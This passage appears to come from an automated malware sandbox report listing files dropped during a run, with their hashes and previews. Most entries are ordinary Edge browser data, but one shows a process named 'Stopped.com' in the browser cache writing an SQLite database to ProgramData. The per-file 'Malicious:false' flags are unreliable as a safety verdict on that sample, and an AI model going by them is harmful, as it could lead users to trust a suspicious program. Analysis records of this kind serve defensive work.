                                                                                                                                                                                                                                                                                          C:\ProgramData\dj5xt\yct00z

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\24ccefbe-d528-4944-b11d-c8603b7e9bc2.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44678
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.095354448218171
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBJwu0hDO6vP6OdPUT3ZZFE0T1H7cGoup1Xl3jVzXq:z/Ps+wsI7yOE36aLchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:2A155C40255809C76E94EC347FFAB1AB
                                                                                                                                                                                                                                                                                          SHA1:4293EDA02D2D8CEA7B41738A67D469E27BBE8D54
                                                                                                                                                                                                                                                                                          SHA-256:940AC90CAD6CC08FF6EFD1161619B46FE30E1AD5B3A93500C6A1EEAA0DF1F246
                                                                                                                                                                                                                                                                                          SHA-512:4B02EF24B4DD879E02432B3C7EDFA5DA6A9DBF57D7F971D5CFC53490052A5F84C84B81FFB5DFD439A7C01483B24638D32641420FDC6D76C63B6F52151303575D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5602ea88-07f6-410e-bd8f-e5b6111fdf20.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):44596
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.0959711427932115
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMwu0hDO6vP6OdPU/D3uJbEvTjcGoup1Xl3jVzXr2:z/Ps+wsI7ynEU6a3chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:84935C321AAA205E26573B05D3F27BDA
                                                                                                                                                                                                                                                                                          SHA1:1EB93A68BE315C5F2DEF0C3D540EB185FE60CEF6
                                                                                                                                                                                                                                                                                          SHA-256:1385A5125244D20151963518553B0A3D4A22EF5903B50D3D072C80063AD01FAE
                                                                                                                                                                                                                                                                                          SHA-512:B606A40261F2BE12150730A92CD3F12E0DC26D5B45034ABC8A83BCA9C86E691D449E7C3D6FB3D8F9BF2BE77C8E0691A7EBBB57BFC09F910BBAEB4BB59B7CA5FF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6d63a302-b571-4d6a-9df9-52fb0b5c4d4c.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):44604
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.095645159561631
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMwu0hDO6vP6OdPUDXZ+sjFcGoup1Xl3jVzXr4CCz:z/Ps+wsI7ynEU6aVchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:9ADE921AAE7B611367DCF13031BDFB5A
                                                                                                                                                                                                                                                                                          SHA1:154A51194BC49470C60415578AEA648021C410B8
                                                                                                                                                                                                                                                                                          SHA-256:A16E0EEF46E78F798D644802BAEE73E35DA137A658727BF6ECC2F2D2CFE7B36F
                                                                                                                                                                                                                                                                                          SHA-512:180183AE2B9A31106C6EA5C6A76427850281C739847415817AE2AF48E85D0E0126A21C625B126C91C506813DAEE338335A514C00A9CA7B783F7F39C210ABCF78
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7f1674b0-be47-45e1-aef2-d412e0d45fdd.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):45875
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.0873740807311805
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:dMkbJrT8IeQc5d9SiQuxhDO6vP6OdPUT3ZZFE0T1H79N2aPiCAoSGoup1Xl3jVzx:dMk1rT8H19SL6aL98aPiRoShu3VlXr4+
                                                                                                                                                                                                                                                                                          MD5:62C5E256A48E09A1607F95A892A04D8B
                                                                                                                                                                                                                                                                                          SHA1:7AA77B83D4560F74A07745F0C98DCCEB5545C2DB
                                                                                                                                                                                                                                                                                          SHA-256:6D5D2E21D2F6492CF7A9452B10AB3FFD7F45DEBCD079BC089A5DADC243739CF2
                                                                                                                                                                                                                                                                                          SHA-512:C0E2CE7B9556E30D1CF49B9884CDE35F94E2F5DAA3CBECBC66FC88B2C08C0F4D83D90A928BF77F7AE5C452106D42BFCA07D556194244D635B2EB96FB4AB439C9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735660761"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8e7fee90-e1a6-42ed-8486-1931599bd131.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44596
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.0959711427932115
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMwu0hDO6vP6OdPU/D3uJbEvTjcGoup1Xl3jVzXr2:z/Ps+wsI7ynEU6a3chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:84935C321AAA205E26573B05D3F27BDA
                                                                                                                                                                                                                                                                                          SHA1:1EB93A68BE315C5F2DEF0C3D540EB185FE60CEF6
                                                                                                                                                                                                                                                                                          SHA-256:1385A5125244D20151963518553B0A3D4A22EF5903B50D3D072C80063AD01FAE
                                                                                                                                                                                                                                                                                          SHA-512:B606A40261F2BE12150730A92CD3F12E0DC26D5B45034ABC8A83BCA9C86E691D449E7C3D6FB3D8F9BF2BE77C8E0691A7EBBB57BFC09F910BBAEB4BB59B7CA5FF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\6192fe0b-395e-4088-a173-918372f0f694.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.640159940159965
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                                                                                                                                          MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                                                                                                                                          SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                                                                                                                                          SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                                                                                                                                          SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.640159940159965
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                                                                                                                                          MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                                                                                                                                          SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                                                                                                                                          SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                                                                                                                                          SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677414C9-1E84.pma

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.04456193348711377
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:1V+0pqtmKnOAWVqYEJgA8x5XSggykfhbNNETjIl/0TQsG1Rc/bn8y08Tcm2RGOdB:b+0ct5M8gk9hZZWy1Sb08T2RGOD
                                                                                                                                                                                                                                                                                          MD5:74BA4D6A6C6E8DB17CB69052A2FEFEF1
                                                                                                                                                                                                                                                                                          SHA1:19DB2FF8BAC563010810A7E2D7D2771855E13098
                                                                                                                                                                                                                                                                                          SHA-256:B2EE4F7E349CB195CD4B9AC8508A8127264F22521238EF148AC6ED6FEBB9576F
                                                                                                                                                                                                                                                                                          SHA-512:97FF1BBF2B303816F132631C167BF24872D36EAA78921FDEEE0615F11246DA2E2B1A74A3D3F502DA840EDFA58317B7EFE1DB56ED98E0BA40D41484902820C882
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@...............Hc...S..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".bfrhfw20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677414D4-1C68.pma

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.044859005873251555
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:p4NDR0pqtm3nOAWVqYDJGA8x5XSggykfhtgB0NEQIy/ERQRuZbTMdn8y08Tcm2Rl:wR0ctcMbuk9h203YlbTc08T2RGOD
                                                                                                                                                                                                                                                                                          MD5:83C28B483FB02D4515E4150667C302C8
                                                                                                                                                                                                                                                                                          SHA1:F7982C1FFA5B09DF68447A28A4C72293D1C543B9
                                                                                                                                                                                                                                                                                          SHA-256:99984B8CCD62AE541AB05723E9AD162BEDE4271ADF22E8B6C1FBEC7DFFF526D6
                                                                                                                                                                                                                                                                                          SHA-512:DE92FFD372A0A124D59C2044524CD45FC6324ED6561BB97B5ED7C061458C89542CD149FEC3C70D45F377B805C4CBC9499FAAEE14AF008C693E8CE7C7D40F0BC4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@...............pe..(U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".bfrhfw20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U..G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.......y...... .2.........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677414D4-DC4.pma

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.4290849957396887
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:cozsp1OFGc3Q9Xfl91EZ7CwXiWxh0RwX2qwfy927sNolSg1HF:ZsprnX99iZ7Cj+BX2qw+27sNolSaH
                                                                                                                                                                                                                                                                                          MD5:29F226DB3E0C96A608CAD823AB23C025
                                                                                                                                                                                                                                                                                          SHA1:722FEB7228451A275E3AFD02FE67EFD81439DD3C
                                                                                                                                                                                                                                                                                          SHA-256:5C7842247AACD35081E85F4A834176EEC1E3164FF855472CE4D1A4C580CBA9FD
                                                                                                                                                                                                                                                                                          SHA-512:59872C97B5A1486F3F98E7258EA740D0D2CE4C69C259B7725FC8597269770AD0D6A6A66F3384A3629243FF6AF6B220006FE89F27CEF8666F88D0DF7AC46DFF7F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@................N...N..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".bfrhfw20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........9...... .2......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):280
